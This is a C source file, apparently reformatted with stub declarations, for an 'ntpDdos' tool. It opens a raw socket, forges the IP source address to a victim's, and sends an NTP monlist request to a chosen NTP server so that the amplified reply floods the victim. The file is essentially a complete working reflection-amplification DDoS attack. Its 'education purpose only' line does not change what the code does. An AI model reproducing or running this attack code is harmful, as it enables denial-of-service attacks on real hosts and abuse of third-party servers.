
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct udpheader {scalar_t__ udp_checksum; void* udp_length; void* udp_destinationPortNumber; void* udp_sourcePortNumber; } ;
struct TYPE_2__ {void* s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; void* sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct ntpreqheader {int rm_vn_mode; int implementation; int request; } ;
struct iphdr {int version; int ihl; int tot_len; int ttl; scalar_t__ check; void* daddr; void* saddr; int protocol; scalar_t__ frag_off; void* id; scalar_t__ tos; } ;
typedef int packet ;
typedef int dest ;


 int AF_INET ;
 int IPPROTO_IP ;
 int IPPROTO_UDP ;
 int IP_HDRINCL ;
 int PF_INET ;
 int SOCK_RAW ;
 int atoi (char*) ;
 scalar_t__ csum (unsigned short*,int) ;
 int exit (int) ;
 void* htons (int) ;
 void* inet_addr (char*) ;
 int memset (char*,int ,int) ;
 int printf (char*) ;
 int sendto (int,char*,int,int ,struct sockaddr*,int) ;
 int setsockopt (int,int ,int ,int*,int) ;
 int socket (int ,int ,int ) ;

int main(int argc, char **argv)
{
int status;
struct iphdr *ip;
struct udpheader *udp;
struct ntpreqheader *ntp;
int sockfd;
int one = 1;
struct sockaddr_in dest;
char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ];


 if( argc != 3){
  printf("Usage: ./ntpDdos [Target IP] [NTP Server IP]\n");
  printf("Example: ./ntpDdos 1.2.3.4 127.0.0.1 \n");
  printf("Watch it on wireshark!\n");
  printf("Coded for education purpose only!\n");
  exit(1);
 }


 sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
 if (sockfd == -1){
  printf("Error on initializing the socket\n");
  exit(1);
 }




 status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
 if (status == -1){
                printf("Error on setting the option HDRINCL on socket\n");
                exit(1);
        }



 memset( packet, 0, sizeof(packet) );




 ip = (struct iphdr *)packet;
 udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
 ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );



 ip->version = 4;
        ip->ihl = 5;
        ip->tos = 0;
        ip->tot_len = sizeof(packet);
        ip->id = htons(1234);
        ip->frag_off = 0;
        ip->ttl = 255;
        ip->protocol = IPPROTO_UDP;
        ip->check = 0;
        ip->saddr = inet_addr( argv[1] );
        ip->daddr = inet_addr( argv[2] );


 udp->udp_sourcePortNumber = htons( atoi( "123" ) );
 udp->udp_destinationPortNumber = htons(atoi("123")) ;
 udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) );
 udp->udp_checksum = 0;


 ip->check = csum((unsigned short *)packet, ip->tot_len);


 dest.sin_family = AF_INET;
 dest.sin_port = htons (atoi( "123" ) ) ;
 dest.sin_addr.s_addr = inet_addr( argv[2] );






 ntp->rm_vn_mode=0x17;
 ntp->implementation=0x03;
 ntp->request=0x2a;




 status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
  if(status <0){
   printf("Failed to send the packets\n");
   exit(1);
  }


}
